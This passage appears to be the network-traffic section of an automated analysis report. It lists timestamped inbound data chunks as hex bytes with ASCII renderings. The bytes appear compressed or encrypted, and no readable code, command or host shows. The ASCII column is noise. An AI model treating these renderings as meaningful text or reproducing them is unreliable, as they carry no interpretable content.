5b 0d 62 cf 45 b6 b2 20 f3 f9 48 66 98 d5 20 f6 42 24 24 60 35 88 bd 18 c9 0c b7 1a c4 5e 52 31 bd 58 0d 62 2f 47 8c f4 a1 b6 7e d8 c1 88 8a 0b 03 Data Ascii: ;U*V]j0AHID"=&^{# 7ob"n'Ah5%j{@[b^TPAaxFAj{4<3iGB^'"fMIf55f5=^UP 9?j{VEn5M[bE Hf B$$`5^R1Xb/G~
2023-11-18 09:02:39 UTC	1764	IN	Data Raw: c9 65 61 b3 c3 00 b3 59 ff 5c 4c f3 fa 94 9c 40 2f b2 56 a6 76 f4 48 49 6c 08 ed 1b 5d 21 45 b5 c0 6f c8 61 56 8c bb f9 45 70 48 77 b9 ba 44 cc 27 f1 ab db db ca a5 fd 9a b3 2f c8 01 d2 08 fe 81 5f d6 86 b5 8b 4c 6d a9 41 5a a9 6f 73 9f 01 c8 e6 1b f3 25 e2 eb c6 3e 69 08 b5 8f f0 ad eb 37 dc a4 52 f0 b0 62 7a 0a f9 fe be 9f 6b bb ea d5 40 ae 9b 7d 65 68 bb fe ac d6 00 2a a5 c9 a5 66 8d 75 64 6a 4d af e7 9b 42 a0 a8 a8 35 6d 45 6d 35 8a 40 49 e1 1a 45 98 0c 06 9a 25 e0 d1 b5 d1 c0 35 7c 5b 14 c1 09 14 e8 ed 96 a2 71 32 d0 0f bc 80 ad 30 12 f0 32 87 d0 5d 2d d6 f3 cd c2 02 0a 54 7a 0c e5 a2 0d a1 03 e3 7c 4d 83 1f 32 09 ac a3 c0 6d 46 33 4b f5 45 4e 89 99 44 7b 75 af c1 4e 53 7a 7d bf d9 4a c8 bf 73 1b a3 a4 2f 23 d1 b5 98 45 14 70 f0 6b f5 51 d2 7f 35 58 Data Ascii: eaY\L@/VvHIl]!EoaVEpHwD'/_LmAZos%>i7Rbzk@}eh*fudjMB5mEm5@IE%5\|[q202]-Tz\|M2mF3KEND{uNSz}Js/#EpkQ5X
2023-11-18 09:02:39 UTC	1780	IN	Data Raw: 82 9f 4c 3e 1f 2f 6a 0a 59 d4 7d 7a cb 35 67 68 da fe af e0 ea 06 2c af c3 7f fb 3f 85 9f 5c 8c ff 73 11 79 72 1f 7e f2 73 fc 9f 6b ff 8f b9 2b 8f 8e a2 4a f7 b7 aa ab f3 75 77 3a 90 a5 93 74 87 24 9d 90 80 88 22 6b 70 c1 e7 00 82 c8 0c 4b 24 20 fa 94 49 02 69 20 43 12 98 04 f0 e1 38 47 3c 20 a8 cc 9c 33 8e 6f ce 51 8f ef a9 67 54 7c e3 ae 11 41 51 16 71 f7 09 2e e3 86 0b 2e 3c 1d 9d 61 e6 e9 b8 8c 22 be ef bb b7 aa eb 56 d5 ad ea 86 79 7f f8 47 35 55 df f7 fb ee bd 75 b7 6a 52 bf fe 7d 78 9c 64 05 1b f4 11 25 69 ed 02 4d e3 c1 0f a3 7b ab 15 bc 0f 4f 5e b0 82 3f c1 93 8f f1 18 79 06 c6 9c 88 27 a3 b4 66 bd 8f 31 b3 2d 07 a8 2d cd d4 96 dd 5a fc 84 0b cc b6 7c 8f b8 ef ac e2 ca 5b e9 79 63 16 37 92 4e 5a cd b6 50 b0 41 1f 25 72 5b a6 a0 7b 72 ab 19 fc af Data Ascii: L>/jY}z5gh,?\syr~sk+Juw:t$"kpK$ Ii C8G< 3oQgT\|AQq..<a"VyG5UujR}xd%iM{O^?y'f1--Z\|[yc7NZPA%r[{r
2023-11-18 09:02:39 UTC	1796	IN	Data Raw: e0 8f e6 22 ae c8 1f c9 33 b9 1a 77 14 bf c8 95 c4 23 b8 98 ab 0a 47 ef 2c ae c8 1f b9 b3 b9 1a 3c 6a 4b 14 1b 51 ab f6 73 55 fe 78 9e c3 d5 b8 83 b5 94 2f 29 0e d4 32 69 b7 56 e7 3b 00 4b 82 7e 8f bb e1 9b 33 a8 df e3 9f c3 0a a7 df e3 d6 06 a1 c4 fe 13 00 f7 8b a3 82 7e 8f 5f 6e 34 36 1c 4e d7 f5 05 f8 8e 8f d3 ef f1 b5 39 4d 89 4d b7 03 16 79 fd 1e 9f de a4 ab f5 a6 f0 93 da e2 94 14 3e 00 be 35 94 f5 7b fc 80 50 17 f5 7b dc 0e df 44 42 fd 1e 5f 0c 2b 4c bf c7 99 11 fc 48 ed 63 12 be a3 99 2f 55 f4 7b fc 91 ba 50 79 c7 87 4f f7 e4 0d 08 df d8 e1 0d 9e b0 dd d5 df 50 c0 fb f9 a0 24 ea f7 f8 3f 35 d5 aa 7e 8f 71 ab dc 01 f4 7b 7c 9e b1 4e 8f c9 d3 71 03 a7 df e3 7d 83 62 6d b2 da f0 41 f0 dd 70 55 bf c7 67 e4 15 c3 55 fd 1e af 37 95 d9 09 b5 5b 9b a2 81 Data Ascii: "3w#G,<jKQsUx/)2iV;K~3~_n46N9MMy>5{P{DB_+LHc/U{PyOP$?5~q{\|Nq}bmApUgU7[
2023-11-18 09:02:39 UTC	1812	IN	Data Raw: cd 4e 15 69 72 a9 68 08 d8 24 86 3b a1 29 66 5b 39 81 4c 0a cd 34 b5 c1 d4 65 f6 95 b8 9b 9f 34 a7 a4 b5 43 f4 30 8d e3 df f7 05 f0 b3 99 56 be 66 29 d1 46 fc cb 2f ed 13 41 a5 64 db b6 41 6c ea ee 08 85 41 51 3c 46 94 15 c0 7d 5e a8 af 13 dc 90 ce 77 bc 53 fc 2a 38 c0 1d c3 b6 69 17 44 53 9d a7 b8 54 4a 8c 9f cd 0e b7 91 fe c2 7e e7 ea 97 f7 51 b4 66 ba 7e 36 c2 08 b5 e6 d0 ed 8e 13 d4 22 18 ef f4 f6 90 1c b8 65 a2 6e 19 11 98 1f 0a fa 02 f3 3a de e3 bf b5 2f 4c 86 a1 a5 d7 7f a0 ac a0 98 07 59 c9 f2 5f 4c 06 5f 61 14 c7 e7 8e e0 ae 42 d6 ff 6b ac 8f 58 29 e0 0d 80 53 a1 d8 da ff ca 7e c5 b8 bd 2f 3b fc e8 a6 64 e1 02 cf c4 d6 e7 e7 ac f7 6b d0 5a 02 5f 66 6a 7d 53 85 a9 15 79 fe e1 01 72 b0 b0 24 25 5e d7 df f2 2a 99 e4 39 e8 73 7c 7f 6b 4a ec 17 29 56 Data Ascii: Nirh$;)f[9L4e4C0Vf)F/AdAlAQ<F}^wS8iDSTJ~Qf~6"en:/LY_L_aBkX)S~/;dkZ_fj}Syr$%^9s\|kJ)V
2023-11-18 09:02:39 UTC	1828	IN	Data Raw: 0d 50 ca 5c c0 20 e6 0e 72 f5 94 27 03 18 c5 dc 51 92 4b 81 f2 58 ab e4 78 6d 5a 16 30 d9 3c f3 83 5a f6 9d 56 c9 4d e4 99 c1 44 4b bd da 52 8f 5d 25 37 5a 96 a1 01 27 f1 e4 6b 92 e8 63 11 ab 28 07 9f 8c 70 9c 24 ba 22 b4 88 c9 0e 91 8f 2d 2a 7e e5 59 c3 89 6b 82 3f 2e fd d9 14 16 d4 47 9c f0 91 2c 8c 0b 36 4e c2 32 f6 a4 78 06 dc c6 4a 80 17 39 8f 17 45 3f ee d7 d2 5f 53 21 9e e7 26 01 7c cc 0d 05 d8 6f ba 03 a8 11 09 95 50 58 bd fa 79 b3 cc 32 f7 89 a8 63 75 bf d1 8d 1d b1 b1 70 75 03 5f c7 80 9d 7c 75 ef 94 f7 7a 9c fd 2e b3 fe 36 0b f8 94 c5 01 4e e8 f5 aa 32 e7 a8 37 8d 5f 55 8c 70 1c bb ae 5c ce ec 39 f9 35 19 b8 9d 17 c9 ee 12 a5 60 f5 7c 21 dc c0 03 5f 8b cc 83 c3 8f bc 10 a9 13 7e 9d 44 ca 0e 4d c9 a6 fd 63 11 de 0f 30 58 84 06 73 b0 01 38 80 20 Data Ascii: P\ r'QKXxmZ0<ZVMDKR]%7Z'kc(p$"-*~Yk?.G,6N2xJ9E?_S!&\|oPXy2cupu_\|uz.6N27_Up\95`\|!_~DMc0Xs8
2023-11-18 09:02:39 UTC	1844	IN	Data Raw: 7d 91 58 2d 96 26 2b 12 d3 ea 96 50 bc 87 27 ad b5 44 7e b2 bc b0 ee 0e 24 13 0e 71 14 b3 f9 13 c7 7b 6f 31 cf b4 d6 e0 bc 82 5e 72 b4 37 c1 d5 72 23 13 40 4c a3 d7 da 23 f4 99 96 88 2c d7 76 de 54 67 f4 32 de 28 2d 7b 5c 4d 54 ca 08 e7 c2 59 ca 77 3e 08 f5 0b f8 9a cd fc 71 39 be 1c 03 5e 16 bf e4 e9 28 c1 07 e5 32 e3 41 6f 40 eb 55 0c b2 da 83 cc d8 5f e3 3f c0 88 fe 9a 3f a3 3d 3a d6 cc 21 ad 3a 79 02 ff e7 6c 1b 8b c0 b7 23 88 32 22 01 e4 9c cc 9c 26 d3 75 61 66 5e 16 78 af 62 ef c5 5c 3f 69 e8 88 d8 82 36 f0 51 ad e3 16 ad 0b 9a 9d 3c 61 a9 d8 66 d9 20 38 2c f3 1e 09 fd c0 7d 26 c6 1a 15 65 a3 aa 22 62 dd ce 03 2e 0c ee dc 9f 27 f9 43 00 21 ae 3b 6b db 73 e4 cb ca 7e 9a d6 d1 71 1d 6d 22 b8 41 59 db 90 d7 0f c9 c5 6d eb 28 e5 25 2b f8 00 b9 33 76 5d Data Ascii: }X-&+P'D~$q{o1^r7r#@L#,vTg2(-{\MTYw>q9^(2Ao@U_??=:!:yl#2"&uaf^xb\?i6Q<af 8,}&e"b.'C!;ks~qm"AYm(%+3v]
2023-11-18 09:02:39 UTC	1860	IN	Data Raw: fa 6c 19 10 e5 da d8 97 63 75 93 8a af d3 22 15 64 d0 58 29 69 9a 2f 96 00 e9 3e 91 74 1a 1f f4 3b 6d 2e f1 6b f1 83 fa d0 83 94 be 79 15 29 ac ec 48 b1 6d 81 05 50 41 1e a8 54 7e 20 30 16 14 fd c1 05 57 81 54 b0 94 b6 e4 fc 97 70 89 a0 5c 95 e4 11 71 ea 17 09 56 2a 19 6a 86 4f 60 cb ca 7f 51 17 0c 04 19 61 6b 0c 29 f7 25 12 8d cf 8a 25 40 84 cc 82 2c fc a3 c1 5a 90 83 7f 34 5a cd 79 f0 8d 33 6f 81 18 c8 e6 42 30 3b 9a 8b 30 dd 75 31 bc 68 2e 81 b7 cc af 63 0c d1 3d f8 7c 29 3e 5f 81 cf 57 e2 f3 55 f8 7c 75 3e 36 d0 c7 86 3f f7 63 67 06 17 0d 80 d9 a4 1f 0a 2b d6 17 43 bc 61 cf e2 e7 c1 86 37 f9 f9 f7 ce d7 b5 1c ec 64 46 08 1f 5e 43 35 15 24 ee 0f 39 43 be 85 c6 46 fa 2d ec a5 11 8f e0 17 1f 23 c7 6c 95 4e a1 7e 87 96 e6 4a c8 55 67 2b 2d de c1 ad 3d f8 Data Ascii: lcu"dX)i/>t;m.ky)HmPAT~ 0WTp\qV*jO`Qak)%%@,Z4Zy3oB0;0u1h.c=\|)>_WU\|u>6?cg+Ca7dF^C5$9CF-#lN~JUg+-=
2023-11-18 09:02:39 UTC	1876	IN	Data Raw: dd d7 41 f7 50 d5 97 e8 8e 44 77 b1 87 05 ad 7b f9 7a 9f db f9 3e 6f 71 f6 6d 13 b3 6f 61 52 6d ce be c1 d9 37 75 66 df 40 55 53 ce be 26 67 5f c7 1e 16 b4 ba 5d 3f f0 15 a2 ab 26 d0 15 b4 58 25 ba 44 74 59 07 5d 42 55 59 a2 0b 12 5d c4 1e 16 b4 a2 5d e8 1c d1 79 13 e8 1c 5a cc 13 9d 21 3a ab 83 ce a0 2a 2b d1 29 89 4e 63 0f 0b 5a da 2e 74 82 e8 a4 09 74 02 2d 26 89 8e 11 1d d7 41 c7 50 15 97 e8 88 44 47 b1 87 05 2d 6a 17 3a 44 74 d8 04 3a 84 16 c3 44 07 88 0e ea a0 03 a8 0a 4a b4 4f a2 fd d8 c3 82 e6 bf fc 0f f7 35 7a 2e bc b0 e8 22 ee 6b f4 20 d5 7b b1 f7 be 46 17 1f ec be e0 1b 74 17 7c 83 ee 62 cd 65 46 0f bc cc e8 01 5f 6b 7b c0 d7 da 1e 2c 09 7f 61 f8 2b c2 5f 10 fe 6a 4d f8 85 e1 57 84 5f 10 7e b5 26 fc c4 f0 33 c2 4f 08 3f 3f 7c d2 b5 5e 07 3e fe Data Ascii: APDw{z>oqmoaRm7uf@US&g_]?&X%DtY]BUY]]yZ!:*+)NcZ.tt-&APDG-j:Dt:DJO5z."k {Ft\|beF_k{,a+_jMW_~&3O??\|^>
2023-11-18 09:02:39 UTC	1892	IN	Data Raw: 65 d7 39 0a 74 14 e1 28 c0 51 74 9d 23 47 47 1e 8e 1c 1c 79 d7 39 32 74 64 e1 c8 c0 91 75 9d 23 45 47 1a 8e 14 1c 69 d7 39 12 74 24 e1 48 c0 91 74 9d 23 46 47 1c 8e 18 1c 71 d7 39 22 74 44 e1 88 c0 11 75 9d 23 44 47 18 8e 10 1c 61 d7 39 02 74 04 e1 08 c0 11 74 9d c3 47 87 1f 0e 1f 1c 7e d7 39 3c 74 78 e1 f0 c0 e1 75 9d e3 f5 1b ef fb fd 86 af 83 7f c3 d7 c1 bf b9 ee be 5f 3a 5e e0 78 86 e3 c5 75 8e 27 3a 2e 70 3c c1 71 71 9d e3 44 c7 19 8e 13 1c e7 6f 5f f7 35 da ff be e9 d3 dd c7 bb 69 97 bb ff fd dd b4 27 fc 05 e4 e5 ee e3 dd b4 d3 dd c7 bb 69 e7 7f ff 6b cd ef 27 54 9d ef f8 6e da e1 8e ef a6 1d b1 87 05 e5 78 67 d3 0b 79 3b a2 f7 26 d0 3b b4 b8 27 7a 43 f4 56 07 bd 41 d5 56 a2 57 12 bd c6 1e 16 94 b5 5d 68 95 68 cd 04 5a 45 8b 1a d1 0b a2 97 3a e8 05 Data Ascii: e9t(Qt#GGy92tdu#EGi9t$Ht#FGq9"tDu#DGa9ttG~9<txu_:^xu':.p<qqDo_5i'ik'Tnxgy;&;'zCVAVW]hhZE:
2023-11-18 09:02:39 UTC	1908	IN	Data Raw: ff 9b 4b d3 dc e8 d2 74 6b bc 21 f3 f6 d2 df 6e 8d d7 e6 63 57 97 34 3e ba a4 f1 d1 e5 66 1a 1f 99 e8 25 d1 0b a2 97 9b 89 9e 99 e8 39 d1 33 a2 e7 9b 89 1e 9b e8 09 d1 63 a2 27 9b 89 1e 9a e8 11 d1 43 a2 47 97 bf a9 e5 57 df 7c f8 80 0f ef f3 e1 83 cd b8 ba 26 ba 47 74 97 e8 de 66 a2 db 26 ba 43 74 9b e8 ce 66 a2 9b 26 ba 45 74 93 e8 d6 66 a2 eb 26 ba 41 74 9d e8 c6 ef 2a 74 d5 7c 78 8d 0f af f2 e1 b5 cd b8 ca 26 ba 42 74 99 e8 ca 66 a2 8b 26 ba 44 74 91 e8 d2 66 a2 f3 26 ba 40 74 9e e8 c2 66 a2 cf 4c 74 8e e8 33 a2 73 bf ab d0 19 f3 e1 59 3e 3c c3 87 67 37 e3 3a 35 d1 69 a2 4f 89 4e db e8 ff 57 93 54 13 7d 42 f4 31 d1 27 9b 89 3e 32 d1 29 a2 8f 88 4e 6d 26 fa d0 44 27 89 3e 24 3a f9 bb 0a 7d 60 3e 3c c1 87 1f f0 e1 89 cd b8 62 26 3a 4e 74 8c e8 f8 66 a2 Data Ascii: Ktk!ncW4>f%93c'CGW\|&Gtf&Ctf&Etf&At*t\|x&Btf&Dtf&@tfLt3sY><g7:5iONWT}B1'>2)Nm&D'>$:}`><b&:Ntf
2023-11-18 09:02:39 UTC	1924	IN	Data Raw: 07 a5 dd b4 06 44 30 83 5a cc 74 49 1c 67 a9 ac c9 6e 65 d1 4d 23 81 98 b1 5a 51 64 70 c0 60 03 42 b8 d4 f6 ac 84 6a ab a9 87 08 e3 a6 22 63 60 49 3d a9 6c 0b 50 ca 1f ad 6d ed ba ef 9e 7b df 7b e7 9c 77 ef 7a 97 76 a6 7c e0 8b b4 f7 be 73 ce 3b ef 77 7f f7 bc f7 ee 79 ef 3c 78 ec 77 8a 3c f6 3b 25 1f fb 5d 0b 4e ad c3 0f 80 e2 c7 5b ff 0f 27 4d 1f d8 82 e7 a0 32 61 f9 1f 1e e9 84 eb 9a 1a a7 c3 79 97 cb ed 68 90 23 ee 75 84 25 e0 5e 47 93 e4 bd d7 11 91 84 f3 3a 9a e5 48 7b 1d cb d5 43 9f b2 d5 02 0f 7d 66 c5 c7 f1 9d c7 b8 de 7d a7 d6 7a 68 5c 3c bc 75 bb f8 f6 a8 f7 3c d7 49 e7 b3 38 2d 45 e7 1b c2 45 fa 18 17 9c 77 c5 27 0b c4 7f d9 12 4f 4c dd 88 9a b6 fa 2a d4 6c 90 c9 2e a7 19 ce 74 ad 41 cd 26 99 cb 72 9a 91 4c d7 3a d4 6c 96 a9 2a a7 b9 3c d3 b5 Data Ascii: D0ZtIgneM#ZQdp`Bj"c`I=lPm{{wzv\|s;wy<xw<;%]N['M2ayh#u%^G:H{C}f}zh\<u<I8-EEw'OLl.tA&rL:l<
2023-11-18 09:02:39 UTC	1940	IN	Data Raw: b6 89 5a a9 fd f5 dc 8b 7f 0a 6d 53 2f 94 0f 8b ca a9 0b 59 35 83 08 ff 39 25 f6 59 1d fe ee f7 14 19 1e a3 41 13 e6 55 5d a2 94 b8 54 68 67 5f 17 1b 2f 15 2b 6f bd 57 ac c1 56 33 1b e2 ed 07 9e 47 55 20 0c bc 3b 5d ff 66 a4 34 76 75 59 b2 a5 ad de a8 ae fb 6a cf b7 b8 89 b3 a2 89 0b f9 46 f6 cd 67 da 85 b3 8d 2f bf f0 6e 21 6a 9c c2 d9 fa 9e 17 7e 29 46 f1 1e 0d 76 50 3a f7 c2 bb 0a fa 41 51 d4 6b 4c ec 44 04 ad 38 5e ce 8d ff 45 16 de e5 84 11 1f 7c cb cc ce bd 51 2b 3d 2e b6 5c cc ae 09 f9 55 70 58 ee 8d 06 ec 98 f7 d6 fb c5 46 b6 f6 70 7e e3 cc 13 58 84 df 1c 2f bc 03 d0 b5 ec db c2 9d 80 ad 41 d0 cf d6 ae 44 15 b8 92 d9 59 05 0e 88 60 fc 71 e3 e1 cb 67 fe aa 87 4a 1c a0 95 c8 37 af df 5f 1a 6b 62 d3 fc f8 8b fa f6 4a 26 7b fd 01 bc c9 14 f2 cd 88 ac Data Ascii: ZmS/Y59%YAU]Thg_/+oWV3GU ;]f4vuYjFg/n!j~)FvP:AQkLD8^E\|Q+=.\UpXFp~X/ADY`qgJ7_kbJ&{
2023-11-18 09:02:39 UTC	1956	IN	Data Raw: 51 25 b1 9a 13 c8 03 81 eb 44 97 46 b1 8d 25 d8 e8 aa 95 8f 35 e7 c7 12 86 f2 49 18 5e 22 88 d3 24 f2 8e 23 89 be ab 1d de bd 01 de 05 df 92 36 16 4e 61 65 93 68 d7 2f c2 37 e3 e1 ae d2 b6 58 92 05 a9 91 41 64 ba 8d de a1 b7 7b 07 5f 73 e9 fe 35 f6 b2 2b 51 ee 80 64 d7 70 ba c1 87 9e a9 63 e1 70 de 5a 00 ea 5e fa 7f dc 3d 7d 7c 14 45 96 dd 93 49 32 40 64 42 c4 33 8a 40 10 45 11 76 f9 34 18 93 1c a0 b6 ab ab 88 8b 46 77 85 28 9e 70 ea b1 51 0f 67 c0 0f 86 04 3a a3 69 87 59 b3 1e b8 89 46 37 ac b8 8b 6c f6 36 fa cb 71 23 9b 5d 26 24 92 ac cc ea 20 51 e6 d8 00 23 0c d2 c9 8c 9a 55 94 91 04 72 f5 5e 55 f5 74 f7 24 03 ba fb c7 fd ee 8f 64 ba bb aa 5e bd 7a 55 f5 5e bd 57 af 5e d1 cc b2 df 52 20 75 d9 9f 85 e1 47 b1 f2 63 c7 e9 ab 54 31 a1 40 8a ac 1c cb 12 34 Data Ascii: Q%DF%5I^"$#6Naeh/7XAd{_s5+QdpcpZ^=}\|EI2@dB3@Ev4Fw(pQg:iYF7l6q#]&$ Q#Ur^Ut$d^zU^W^R uGcT1@4
2023-11-18 09:02:39 UTC	1972	IN	Data Raw: 8c 0e 04 bb 37 d1 3f 9a b6 46 78 0e 41 5d 84 73 92 00 bd f6 0e d5 ac c4 ab f9 2f b3 91 db 90 89 38 3e e0 10 1c 26 e5 7e 8b a7 27 4a 18 af 23 37 1a 29 57 4a 94 bb 9d 28 97 42 0b f9 85 0e 46 b9 9a 1b 51 ba b0 00 53 63 02 53 66 02 23 f2 1a 7f 31 07 f4 18 37 ea 7e df 57 2d e1 66 52 7a b5 4a 7b 8b 8b 53 21 63 f2 22 b4 04 8d f8 24 16 d3 cd d0 61 be 63 49 f6 ee 2f df 8d c5 48 63 b7 a2 94 fd af 73 91 dd f3 b9 44 5d 6a 9d de cc 5a ef d3 d7 bf 1b d0 20 3c ca e7 00 0f 93 e1 ac 6d ee 20 bd 82 39 9a 6f 2a a7 19 cd 37 03 ae 31 7e e0 39 f4 81 77 32 3a 45 97 eb df d1 6c f1 1d 37 7c aa 7f c7 8a 59 20 2a 3b 42 e6 ed ed 3c 74 40 74 5d 8a ce 12 0d 8a 33 c3 be dd f1 96 4f 6b 58 e8 cd aa 12 2a 77 94 a5 d6 ed 89 c5 84 e9 39 8f dc 2b 12 f9 09 9b 7e 7f ab 8a fb 3f c8 74 0d e8 10 Data Ascii: 7?FxA]s/8>&~'J#7)WJ(BFQScSf#17~W-fRzJ{S!c"$acI/HcsD]jZ <m 9o71~9w2:El7\|Y ;B<t@t]3OkX*w9+~?t
2023-11-18 09:02:40 UTC	1988	IN	Data Raw: 44 52 75 db 77 5a a1 8a f4 b3 d0 73 8f b4 3c 98 ed 2a 94 24 7d 24 fc 9d 5e 51 dd 7a db 8d e8 cd 97 32 38 bd 8d 38 fd 43 c1 e9 ed c8 e9 fc 0b c0 e9 7e f8 c1 62 7f e9 b7 a9 8d bd dc fc 12 a7 0e c0 23 78 d2 9f 3e 13 62 e3 67 23 5a e2 40 ee 70 7b 82 57 07 49 06 d1 f7 77 6f e7 d4 04 79 45 dd a6 cf e2 76 e6 de ad b8 b7 f1 02 d0 94 d8 36 fd b5 98 8a 3b 28 c4 5f ac 72 09 9f c9 63 ee fd cc 73 00 b8 3a cb b7 62 ed 6a be 65 ab 6f d6 8a e7 5e 58 cb f7 70 c5 66 3d f7 c2 f2 e7 b9 3a e8 9f f5 d3 35 2f 2c e7 d6 6a 2f 38 57 3c cf 15 06 84 7d 7a fd b3 5c 6b c4 66 ad 5d e1 5d cf 07 67 fa 67 fd e3 f2 15 5e 86 b7 d2 ec 12 35 21 28 f7 0e 32 f7 9e f8 ad b8 b5 c4 03 44 ee 32 44 88 cc bd cc f3 8e e2 de ab 78 de d1 bb 9d ee a8 d3 d3 23 14 85 c1 1d 9a e0 69 16 ea ce e0 8e 4c f0 74 Data Ascii: DRuwZs<*$}$^Qz288C~b#x>bg#Z@p{WIwoyEv6;(_rcs:bjeo^Xpf=:5/,j/8W<}z\kf]]gg^5!(2D2Dx#iLt
2023-11-18 09:02:40 UTC	2004	IN	Data Raw: e8 6c 36 6b 5b 52 58 ee a0 eb 5a e8 12 33 db a1 89 9f 6a 06 dd 0e f5 e7 6a 31 9f 4d 1c 92 c4 e7 19 4c 2f 52 7f 26 2e b1 81 16 da a1 ab 0b 29 6c fc 10 fd fe 3d 50 37 f5 8d a1 5c c4 2c f6 47 54 64 f3 a2 84 12 fc e1 c8 22 cd 1e 88 84 3d 4a f3 a0 fe d5 4c 68 f9 a1 7e c3 f2 55 d9 c9 f9 8f 98 e0 d9 d5 84 6b 19 4e d1 4c 2e 5b 56 ae 38 f0 84 ce b0 1d 57 36 d4 68 27 ac 64 c2 08 05 f6 58 e2 92 b0 38 47 b4 51 e9 46 60 4c 81 79 cc 3b 13 fd bc 46 bc d7 83 32 d1 b2 15 6f ea 7c 6c 14 59 9e a4 6a 19 42 a9 63 cd c4 21 6c d2 3f 94 f7 2c 8b 25 cf 65 4a d8 3d 0a 31 8a 4b 62 4a 4c 81 49 46 79 d9 5e c2 bc 90 1d b9 55 59 9d 41 b4 7e db 6d 34 0f 03 33 84 ab f4 87 e8 69 1d 93 6e 2e c6 a9 b3 ea 38 3c 62 be 67 0e 75 79 ff 4a 84 76 08 9d 9d 1b b3 4d 98 70 0b ac 35 9b e2 20 c2 35 c0 Data Ascii: l6k[RXZ3jj1ML/R&.)l=P7\,GTd"=JLh~UkNL.[V8W6h'dX8GQF`Ly;F2o\|lYjBc!l?,%eJ=1KbJLIFy^UYA~m43in.8<bguyJvMp5 5
2023-11-18 09:02:40 UTC	2020	IN	Data Raw: e9 d8 9c 51 b0 a5 fb 4b e9 ba 4b 6b 3c a8 df 89 e9 76 a3 f1 f9 b6 7d b0 71 f3 1e 48 2d b7 8e dc 9c 39 18 d6 d7 dc 25 3d a8 5a 1b 26 86 bf c3 36 1f 87 a3 e6 d8 5d 1c 7a 7e 3b fa 47 16 4a e3 ea 0e 81 bf 47 9a c2 b9 e7 5b 31 73 d6 1c 98 f4 b4 35 ee bb 36 9b 6c fa eb 0d fa 4f 6a 8a 49 1d 29 3e 38 87 c0 f5 1a db 70 5a 9b 2f a4 7c ed fd d8 68 f1 03 f2 21 a1 26 5c 79 7f 45 1a b3 3d 03 b2 9f 9f 27 93 ab c4 e0 fd 9d 23 c0 fb fb 5a 78 b0 2b 08 5a ed 37 41 e7 a0 32 52 8f 76 ef 70 53 cc 1b 08 1f 1e 81 63 af 27 83 dd e4 0f 18 df e4 2c 19 f3 30 18 66 b9 6f c6 aa fe d5 71 f0 96 a1 e4 e5 dc 15 18 39 eb 01 16 ce ce c7 7a f7 bd 60 b9 66 31 5a 9c 0e 21 83 7a 8d 04 e1 c3 50 29 d3 5d 4d f9 d9 3b 69 cd dc 09 b8 fa 09 92 b0 cb dd f0 c5 9c 36 40 2a 1d 83 66 1b d6 91 5c 5f 2f b8 Data Ascii: QKKk<v}qH-9%=Z&6]z~;GJG[1s56lOjI)>8pZ/\|h!&\yE='#Zx+Z7A2RvpSc',0foq9z`f1Z!zP)]M;i6@*f\_/
2023-11-18 09:02:40 UTC	2036	IN	Data Raw: d3 d1 40 a7 8f 1c 48 41 e6 14 3c 1c a7 02 25 61 3f 54 49 fe 80 e6 cb be 84 81 bc 8b e0 6e e3 0a 7c 6d 28 0d 9c 2d 4c e1 95 c7 ca 68 86 84 2c ec 7c 7f 07 48 3d 58 04 56 82 03 e8 8e 3b 61 a0 71 3a 07 68 98 16 01 bb 96 f3 c8 ca 64 38 88 94 7d 05 6e d3 eb 82 f8 72 4a 94 25 21 0f f2 6f 73 87 62 8f 14 40 fd 19 53 d8 78 7c 0e bc bf d9 84 8e 9e 6a 84 fa 62 66 40 64 ec 0d 68 fa b1 0a 24 de 50 c3 81 e4 3b 48 ec e2 36 78 69 fa 10 7a 40 b4 09 1e bb c5 0a b9 ab cf 42 c9 c4 1f a0 dd 68 37 60 f1 94 00 47 94 00 38 76 c1 16 65 9d 6e 00 77 8d e7 40 be 5b 09 bc 6b c6 84 b0 dd 74 87 9f b6 bc 03 48 64 09 8c 7f 0b e0 a3 cf 9f 81 52 fd 12 98 a7 7b 08 5f 06 17 a0 77 a2 6d e1 cb 03 3d 20 82 7b 1a 4e 6e 69 83 5b cf cd c1 88 99 51 d4 c0 df 0c 38 52 cb a3 92 c3 9e 30 f3 19 1e 79 e8 Data Ascii: @HA<%a?TIn\|m(-Lh,\|H=XV;aq:hd8}nrJ%!osb@Sx\|jbf@dh$P;H6xiz@Bh7`G8venw@[ktHdR{_wm= {Nni[Q8R0y
2023-11-18 09:02:40 UTC	2052	IN	Data Raw: 18 68 bf a9 7b 31 b9 ed 64 a2 fd 6b ab 3c 0e 50 d8 dc f7 de a7 a8 3b 6c 7e f7 e3 18 ad a7 81 2d 5f 15 9b 84 f9 da 76 df ef 71 44 99 2b 42 ee c2 ca d8 6f 97 26 b8 66 3a fc c9 7f dc bc a9 9d 33 8a ef e1 8a 50 d8 f1 f6 d8 96 e3 89 2a 2a 62 db b6 88 4d ef a2 32 51 ff e1 fa 59 3e ef d5 f4 53 56 a9 2b 65 79 8c 79 82 07 65 33 9b 2e 45 5a 67 a4 ec 78 7b 5e 2d fb 84 87 d4 08 03 eb 44 e4 16 f4 b2 7e 6e 1f ff b6 97 2f 26 be fb 94 c0 f9 52 a1 4c 8a 8e 7b 46 f3 d2 42 bc 1c 6d 84 e7 19 e2 dd 5f 13 05 a7 1b ee 72 17 1d 90 a4 db 77 14 65 17 51 be b4 6d 53 e0 ab bc eb 94 b1 df f6 3c fe 5a a0 72 52 c6 c6 89 79 af c9 c5 3d 77 df 4e a6 72 71 39 5e d3 55 de ff 86 27 d4 b5 8b 65 91 b1 f2 87 6f ce f3 42 12 0d 75 bd 8b 52 cd dd 0c 75 91 0b 4d 09 75 ae 5b 5d 6f 3c ca 8e 1f 28 09 Data Ascii: h{1dk<P;l~-_vqD+Bo&f:3P**bM2QY>SV+eyye3.EZgx{^-D~n/&RL{FBm_rweQmS<ZrRy=wNrq9^U'eoBuRuMu[]o<(
